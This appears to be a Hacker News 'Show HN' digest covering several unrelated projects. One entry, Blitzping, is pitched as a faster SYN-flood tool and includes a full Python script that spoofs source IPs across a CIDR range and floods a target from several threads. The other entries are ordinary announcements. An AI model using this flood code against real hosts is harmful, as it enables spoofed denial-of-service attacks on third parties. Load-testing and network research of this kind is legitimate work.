The best Hacker News stories from Show from the past day
Latest posts:
Show HN: Linux Mint Redesign Proposal
After several months of work together with other designers, I want to announce a Linux Mint redesign proposal.

First time posting; I hope you like it!
Show HN: NetSour, CLI Based Wireshark
This code is still in early beta, but I sincerely hope it will become as ubiquitous as Vim on Linux.
Show HN: Sendune – open-source HTML email designer
Demo: https://designer.sendune.com/

Code: https://github.com/SendWithSES/Drag-and-Drop-Email-Designer

HTML for email is probably the hardest code to write. Even a tiny deviation from the rules will break the email in untold combinations of OS, desktop, and mobile clients.

It's mid-2024, almost 50 years since email was invented and 35 years since HTML was born. A basic open-source HTML email designer must be a solved problem, right? We thought so too. Sadly, that's not the case.

There are a few decent open-source email designers, but they carry dependencies that make them cumbersome to embed within your app. That's why we decided to open source our HTML email designer.

The SENDUNE email designer focuses on simplicity and ease of use. It is lightweight. It produces pure HTML, with no intermediate code wranglers like MJML, and there is no lock-in of any kind: save the HTML output as a template and use it with any email service provider.

Feel free to fork the repository, make improvements, and submit pull requests.

AMA: hello at sendune dot com
Show HN: I made a privacy-friendly and free image, audio and video converter
Show HN: Llm2sh – Translate plain-language requests into shell commands
This is my take on the common "use LLMs to generate shell commands" utility. Emphasis is placed on good CLI UX, simplicity, and flexibility.

`llm2sh` supports multiple LLM providers and lets LLMs generate multi-command sequences to handle complex tasks. There is also limited support for commands requiring `sudo` and other basic input.

I recommend Groq's llama3-70b for day-to-day use. The ultra-low latency is a game changer: its near-instant responses help `llm2sh` integrate seamlessly into day-to-day tasks without breaking you out of the 'zone'. For more advanced tasks, swapping to smarter models is just a CLI option away.
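To make the pattern concrete, here is a rough Python sketch of how such a tool can work; this is not llm2sh's actual code, and the Groq endpoint and model id below are assumptions. The idea is to ask an OpenAI-compatible chat endpoint for a JSON array of shell commands, show them to the user, and run them only after confirmation.

import json, os, subprocess, sys
import requests

SYSTEM_PROMPT = ("You translate the user's request into shell commands. "
                 "Reply with a JSON array of command strings and nothing else.")

def plan(request: str) -> list[str]:
    # Any OpenAI-compatible chat endpoint works here; Groq's URL and the
    # llama3-70b model id are assumptions for this sketch.
    resp = requests.post(
        "https://api.groq.com/openai/v1/chat/completions",
        headers={"Authorization": f"Bearer {os.environ['GROQ_API_KEY']}"},
        json={"model": "llama3-70b-8192",
              "messages": [{"role": "system", "content": SYSTEM_PROMPT},
                           {"role": "user", "content": request}]},
        timeout=30,
    )
    resp.raise_for_status()
    return json.loads(resp.json()["choices"][0]["message"]["content"])

if __name__ == "__main__":
    commands = plan(" ".join(sys.argv[1:]))
    print("\n".join(commands))
    if input("Run these commands? [y/N] ").strip().lower() == "y":
        for cmd in commands:
            # Interactive prompts (e.g., sudo passwords) pass through the TTY.
            subprocess.run(cmd, shell=True, check=False)

Invoked as, say, python sketch.py "free up disk space in /var/log", it prints the proposed commands before anything runs.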
Show HN: I made an AI image enhancer that boosts images 10x to 12k pixels
Hey HN,

My wife is a designer, and one day she asked me if there was a tool to enhance images and improve their quality. I recommended a few to her, but she found that the suitable ones were too expensive, and the more affordable options didn't offer enough magnification, with most only going up to 2x or 4x.

So I thought, why not create a tool that meets her needs: one that can greatly enhance image resolution and clarity while being very affordable to use?

After over a month of effort, I finally completed this tool. It can now enlarge images up to 10x, with output up to 12,000 pixels.

I hope this tool will be as helpful to you as it is to my wife. I would love your feedback.

Charles
Show HN: How we leapfrogged traditional vector based RAG with a 'language map'
TL;DR: Vector-based RAG performs poorly for many real-world applications like codebase chat, and you should consider 'language maps'.

Part of our mission at Mutable.ai is to make it much easier for developers to build and understand software. One of the natural ways to do this is to create a codebase chat that answers questions about your repo and helps you build features.

It might seem simple to plug your codebase into a state-of-the-art LLM, but LLMs have two limitations that make human-level assistance with code difficult:

1. They currently have context windows that are too small to accommodate most codebases, let alone your entire organization's codebases.

2. They need to answer immediately, without thinking through the answer "step by step."

We built a chat about a year ago based on keyword retrieval and vector embeddings. No matter how hard we tried, including training our own dedicated embedding model, we could not get good performance out of it.

Here is a typical example: https://x.com/mutableai/article/1813815706783490055/media/1813813912472870913

If you asked how to do quantization in llama.cpp, the answers were oddly specific and consistently pulled in the wrong context, especially from tests. We could, of course, take countermeasures, but it felt like a losing battle.

So we went back to step 1: let's understand the code, let's do our homework. For us, that meant actually putting an understanding of the codebase down in a document, a Wikipedia-style article called Auto Wiki. The wiki features diagrams and citations into your codebase. Example: https://wiki.mutable.ai/ggerganov/llama.cpp

This wiki is useful in and of itself for onboarding and understanding the business logic of a codebase, but one of our hopes in constructing such a document was that we'd be able to circumvent traditional keyword- and vector-based RAG approaches.

It turns out that using a wiki to find context for an LLM overcomes many of the weaknesses of our previous approach, while still scaling to arbitrarily large codebases:

1. Instead of retrieving context through vectors or keywords, context is retrieved by following the sources that the wiki cites.

2. Answers are based both on the relevant section(s) of the wiki AND on the content of the actual code that we put into memory; this functions as a "language map" of the codebase.

See it in action below for the same query as our old codebase chat:

https://x.com/mutableai/article/1813815706783490055/media/1813814321144844288

https://x.com/mutableai/article/1813815706783490055/media/1813814363939315712

The answer cites its sources in both the wiki and the actual code, and gives a step-by-step guide to doing quantization with example code. The quality of the answer is dramatically improved: it is more accurate, relevant, and comprehensive.

It turns out language models love being given language, not a bunch of text snippets that happen to be nearby in vector space or share certain keywords. We see strong performance consistently across codebases of all sizes. The results from the chat are so good they even surprised us a little; you should try it on a codebase of your own at https://wiki.mutable.ai, which we are happy to do for free for open-source code and which starts at just $2/mo/repo for private repos.

We are introducing evals demonstrating how much better our chat is with this approach, but we were so happy with the results that we wanted to share them with the whole community.

Thank you!
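To make the mechanism concrete, here is a simplified Python sketch of citation-based retrieval; the data layout and the word-overlap ranking heuristic are illustrative assumptions, not Mutable.ai's implementation. Each wiki section carries the list of source files it cites, the most relevant sections are chosen first, and the prompt is assembled from the section text plus the cited code rather than from vector-nearest chunks.

from dataclasses import dataclass
from pathlib import Path

@dataclass
class WikiSection:
    title: str
    body: str
    citations: list[str]          # repository paths this section cites

def select_sections(question: str, wiki: list[WikiSection], k: int = 3) -> list[WikiSection]:
    # Stand-in ranking: word overlap between the question and the section text.
    # A real system could instead let an LLM (or a learned ranker) pick sections.
    words = set(question.lower().split())
    def score(section: WikiSection) -> int:
        return len(words & set((section.title + " " + section.body).lower().split()))
    return sorted(wiki, key=score, reverse=True)[:k]

def build_context(question: str, wiki: list[WikiSection], repo_root: Path) -> str:
    parts = []
    for section in select_sections(question, wiki):
        parts.append(f"Wiki section: {section.title}\n{section.body}")
        for rel_path in section.citations:             # follow the wiki's citations
            code = (repo_root / rel_path).read_text(errors="ignore")
            parts.append(f"Cited file: {rel_path}\n{code}")
    return "\n\n".join(parts)   # handed to the LLM alongside the user's question

The retrieval step never looks at embeddings: relevance comes from the prose of the wiki, and the code enters the prompt only because the wiki cites it.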
Show HN: Blitzping – A far faster nping/hping3 SYN-flood alternative with CIDR
I found hping3 and nmap's nping to be far too slow at sending individual, bare-minimum (40-byte) TCP SYN packets; beyond inefficient socket I/O, they were also doing far too much unnecessary processing in what should otherwise be a tight execution loop. Furthermore, none of them were able to handle CIDR notations (i.e., a range of IP addresses) as their source IP parameter. Being intended for embedded devices (e.g., low-power MIPS/Arm-based routers), Blitzping only depends on standard POSIX headers and a C11 libc (whether musl or gnu). Even while supporting CIDR prefixes, Blitzping is significantly faster than hping3, nping, and everything else I could find on GitHub.

Here are some of the performance optimizations specific to Blitzping:

* Pre-generation: all the static parts of the packet buffer are generated once, outside the sendto() tight loop;

* Asynchronous I/O: raw sockets are configured to be non-blocking by default;

* Multithreading: the same socket is polled in sendto() from multiple threads; and

* Compiler flags: compiling with -Ofast, -flto, and -march=native (though these had little effect; by that point, the bottleneck is the kernel's own sendto() routine).

Shown below are comparisons between the three programs across two CPUs (more details at the GitHub repository):

# Quad-Core "Rockchip RK3328" CPU @ 1.3 GHz (ARMv8-A) #
+--------------------+--------------+--------------+---------------+
| ARM (4 x 1.3 GHz) | nping | hping3 | Blitzping |
+--------------------+--------------+--------------+---------------+
| Num. Instances | 4 (1 thread) | 4 (1 thread) | 1 (4 threads) |
| Pkts. per Second | ~65,000 | ~80,000 | ~275,000 |
| Bandwidth (MiB/s) | ~2.50 | ~3.00 | ~10.50 |
+--------------------+--------------+--------------+---------------+
# Single-Core "Qualcomm Atheros QCA9533" SoC @ 650 MHz (MIPS32r2) #
+--------------------+--------------+--------------+---------------+
| MIPS (1 x 650 MHz) | nping | hping3 | Blitzping |
+--------------------+--------------+--------------+---------------+
| Num. Instances | 1 (1 thread) | 1 (1 thread) | 1 (1 thread) |
| Pkts. per Second | ~5,000 | ~10,000 | ~25,000 |
| Bandwidth (MiB/s) | ~0.20 | ~0.40 | ~1.00 |
+--------------------+--------------+--------------+---------------+
I tested Blitzping against both hping3 and nping on two different routers, both running OpenWrt 23.05.03 (Linux kernel v5.15.150) with the "masquerading" option (i.e., NAT) turned off in the firewall; one device was a single-core 32-bit MIPS SoC, and the other a quad-core 64-bit ARMv8 CPU. On the quad-core CPU, because both hping3 and nping were designed without multithreading capabilities (unlike Blitzping), I made the competition "fairer" by launching them as four individual processes, as opposed to Blitzping using only one. Across all runs and on both devices, CPU usage remained at 100%, entirely dedicated to the program under test. Finally, the connection itself was not a bottleneck: both devices were connected to an otherwise-unused 200 Mb/s (23.8419 MiB/s) download/upload line through a WAN Ethernet interface.

It is important to note that Blitzping was not doing any less work than hping3 and nping; in fact, it was doing more. While hping3 and nping only randomized each packet's source port against a fixed source address, Blitzping randomized not only the source port but also the source IP within a CIDR range, a capability that is more computationally intensive and that both hping3 and nping lack in the first place. Lastly, hping3 and nping were both launched with the "best-case" command-line parameters so as to maximize their speed and disable runtime stdio logging.
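To illustrate the pre-generation idea, here is a rough Python sketch of the same scheme; these are my assumptions, not Blitzping's C code, and the target and source range are documentation addresses. The 40-byte IPv4+TCP SYN template is packed once, and the loop only patches the randomized source IP, source port, sequence number, and checksums before each sendto(). It needs root privileges for the raw socket, and it uses one socket per thread for simplicity, whereas Blitzping shares a single socket across threads.

import random, socket, struct, threading

DST_IP, DST_PORT = "192.0.2.10", 80           # example target (TEST-NET-1)
SRC_BASE, SRC_PREFIX = "203.0.113.0", 24      # example source CIDR range
PACKETS_PER_THREAD = 100_000

def csum(data: bytes) -> int:
    # RFC 1071 ones'-complement checksum over 16-bit words.
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def make_template() -> bytearray:
    # Static fields are packed exactly once; only src IP/port, seq, and
    # checksums are rewritten inside the send loop.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64,
                     socket.IPPROTO_TCP, 0, b"\x00" * 4, socket.inet_aton(DST_IP))
    tcp = struct.pack("!HHIIBBHHH", 0, DST_PORT, 0, 0, 5 << 4, 0x02, 65535, 0, 0)
    return bytearray(ip + tcp)

def flood() -> None:
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    pkt = make_template()
    base = struct.unpack("!I", socket.inet_aton(SRC_BASE))[0]
    span = 1 << (32 - SRC_PREFIX)
    for _ in range(PACKETS_PER_THREAD):
        pkt[12:16] = struct.pack("!I", base + random.randrange(span))   # src IP
        pkt[20:22] = struct.pack("!H", random.randrange(1024, 65536))   # src port
        pkt[24:28] = struct.pack("!I", random.getrandbits(32))          # seq
        pkt[10:12] = b"\x00\x00"
        pkt[10:12] = struct.pack("!H", csum(bytes(pkt[:20])))           # IP checksum
        pseudo = bytes(pkt[12:20]) + struct.pack("!BBH", 0, socket.IPPROTO_TCP, 20)
        pkt[36:38] = b"\x00\x00"
        pkt[36:38] = struct.pack("!H", csum(pseudo + bytes(pkt[20:])))  # TCP checksum
        sock.sendto(bytes(pkt), (DST_IP, 0))

if __name__ == "__main__":
    threads = [threading.Thread(target=flood) for _ in range(4)]  # one process, four threads
    for t in threads:
        t.start()
    for t in threads:
        t.join()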
Show HN: Pippy – Pipelines for GitHub Actions
I am excited to share pippy, which allows users to create configurable pipelines using GitHub Actions. If you have used Azure Pipelines: in summary, this is Azure Pipelines meets GitHub Actions.

Cloud version: https://app.pippy.dev/login (closed beta)

I am also open-sourcing the command-line version: https://github.com/nixmade/pippy

Key features:

- Automatic rollback

- Datadog monitoring

- Pause/resume

The product is built on an open-source orchestrator: https://github.com/nixmade/orchestrator

The orchestrator lets you roll out to a specific set of targets and provides monitoring capabilities to optionally roll back. I hope to provide a cloud API so platforms can orchestrate updates using the framework.

Tech stack:

Database: Postgres

Backend: Golang

Frontend: React + shadcn/ui

Cloud: Azure Container Apps

Please leave your feedback in the comments. I hope you can give the command-line version a try and sign up for the beta of the cloud version.